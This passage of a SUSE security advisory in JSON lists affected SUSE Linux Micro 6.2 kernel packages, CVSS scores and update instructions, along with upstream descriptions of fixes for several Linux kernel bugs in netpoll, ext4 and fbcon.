"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68241",
"url": "https://www.suse.com/security/cve/CVE-2025-68241"
},
{
"category": "external",
"summary": "SUSE Bug 1255157 for CVE-2025-68241",
"url": "https://bugzilla.suse.com/1255157"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68241"
},
{
"cve": "CVE-2025-68245",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68245"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: netpoll: fix incorrect refcount handling causing incorrect cleanup\n\ncommit efa95b01da18 (\"netpoll: fix use after free\") incorrectly\nignored the refcount and prematurely set dev-\u003enpinfo to NULL during\nnetpoll cleanup, leading to improper behavior and memory leaks.\n\nScenario causing lack of proper cleanup:\n\n1) A netpoll is associated with a NIC (e.g., eth0) and netdev-\u003enpinfo is\n allocated, and refcnt = 1\n - Keep in mind that npinfo is shared among all netpoll instances. In\n this case, there is just one.\n\n2) Another netpoll is also associated with the same NIC and\n npinfo-\u003erefcnt += 1.\n - Now dev-\u003enpinfo-\u003erefcnt = 2;\n - There is just one npinfo associated to the netdev.\n\n3) When the first netpolls goes to clean up:\n - The first cleanup succeeds and clears np-\u003edev-\u003enpinfo, ignoring\n refcnt.\n - It basically calls `RCU_INIT_POINTER(np-\u003edev-\u003enpinfo, NULL);`\n - Set dev-\u003enpinfo = NULL, without proper cleanup\n - No -\u003endo_netpoll_cleanup() is either called\n\n4) Now the second target tries to clean up\n - The second cleanup fails because np-\u003edev-\u003enpinfo is already NULL.\n * In this case, ops-\u003endo_netpoll_cleanup() was never called, and\n the skb pool is not cleaned as well (for the second netpoll\n instance)\n - This leaks npinfo and skbpool skbs, which is clearly reported by\n kmemleak.\n\nRevert commit efa95b01da18 (\"netpoll: fix use after free\") and adds\nclarifying comments emphasizing that npinfo cleanup should only happen\nonce the refcount reaches zero, ensuring stable and correct netpoll\nbehavior.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68245",
"url": "https://www.suse.com/security/cve/CVE-2025-68245"
},
{
"category": "external",
"summary": "SUSE Bug 1255268 for CVE-2025-68245",
"url": "https://bugzilla.suse.com/1255268"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68245"
},
{
"cve": "CVE-2025-68261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: add i_data_sem protection in ext4_destroy_inline_data_nolock()\n\nFix a race between inline data destruction and block mapping.\n\nThe function ext4_destroy_inline_data_nolock() changes the inode data\nlayout by clearing EXT4_INODE_INLINE_DATA and setting EXT4_INODE_EXTENTS.\nAt the same time, another thread may execute ext4_map_blocks(), which\ntests EXT4_INODE_EXTENTS to decide whether to call ext4_ext_map_blocks()\nor ext4_ind_map_blocks().\n\nWithout i_data_sem protection, ext4_ind_map_blocks() may receive inode\nwith EXT4_INODE_EXTENTS flag and triggering assert.\n\nkernel BUG at fs/ext4/indirect.c:546!\nEXT4-fs (loop2): unmounting filesystem.\ninvalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014\nRIP: 0010:ext4_ind_map_blocks.cold+0x2b/0x5a fs/ext4/indirect.c:546\n\nCall Trace:\n \u003cTASK\u003e\n ext4_map_blocks+0xb9b/0x16f0 fs/ext4/inode.c:681\n _ext4_get_block+0x242/0x590 fs/ext4/inode.c:822\n ext4_block_write_begin+0x48b/0x12c0 fs/ext4/inode.c:1124\n ext4_write_begin+0x598/0xef0 fs/ext4/inode.c:1255\n ext4_da_write_begin+0x21e/0x9c0 fs/ext4/inode.c:3000\n generic_perform_write+0x259/0x5d0 mm/filemap.c:3846\n ext4_buffered_write_iter+0x15b/0x470 fs/ext4/file.c:285\n ext4_file_write_iter+0x8e0/0x17f0 fs/ext4/file.c:679\n call_write_iter include/linux/fs.h:2271 [inline]\n do_iter_readv_writev+0x212/0x3c0 fs/read_write.c:735\n do_iter_write+0x186/0x710 fs/read_write.c:861\n vfs_iter_write+0x70/0xa0 fs/read_write.c:902\n iter_file_splice_write+0x73b/0xc90 fs/splice.c:685\n do_splice_from fs/splice.c:763 [inline]\n direct_splice_actor+0x10f/0x170 fs/splice.c:950\n splice_direct_to_actor+0x33a/0xa10 fs/splice.c:896\n do_splice_direct+0x1a9/0x280 fs/splice.c:1002\n do_sendfile+0xb13/0x12c0 fs/read_write.c:1255\n __do_sys_sendfile64 fs/read_write.c:1323 [inline]\n __se_sys_sendfile64 fs/read_write.c:1309 [inline]\n __x64_sys_sendfile64+0x1cf/0x210 fs/read_write.c:1309\n do_syscall_x64 arch/x86/entry/common.c:51 [inline]\n do_syscall_64+0x35/0x80 arch/x86/entry/common.c:81\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68261",
"url": "https://www.suse.com/security/cve/CVE-2025-68261"
},
{
"category": "external",
"summary": "SUSE Bug 1255164 for CVE-2025-68261",
"url": "https://bugzilla.suse.com/1255164"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68261"
},
{
"cve": "CVE-2025-68296",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68296"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup\n\nProtect vga_switcheroo_client_fb_set() with console lock. Avoids OOB\naccess in fbcon_remap_all(). Without holding the console lock the call\nraces with switching outputs.\n\nVGA switcheroo calls fbcon_remap_all() when switching clients. The fbcon\nfunction uses struct fb_info.node, which is set by register_framebuffer().\nAs the fb-helper code currently sets up VGA switcheroo before registering\nthe framebuffer, the value of node is -1 and therefore not a legal value.\nFor example, fbcon uses the value within set_con2fb_map() [1] as an index\ninto an array.\n\nMoving vga_switcheroo_client_fb_set() after register_framebuffer() can\nresult in VGA switching that does not switch fbcon correctly.\n\nTherefore move vga_switcheroo_client_fb_set() under fbcon_fb_registered(),\nwhich already holds the console lock. Fbdev calls fbcon_fb_registered()\nfrom within register_framebuffer(). Serializes the helper with VGA\nswitcheroo\u0027s call to fbcon_remap_all().\n\nAlthough vga_switcheroo_client_fb_set() takes an instance of struct fb_info\nas parameter, it really only needs the contained fbcon state. Moving the\ncall to fbcon initialization is therefore cleaner than before. Only amdgpu,\ni915, nouveau and radeon support vga_switcheroo. For all other drivers,\nthis change does nothing.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
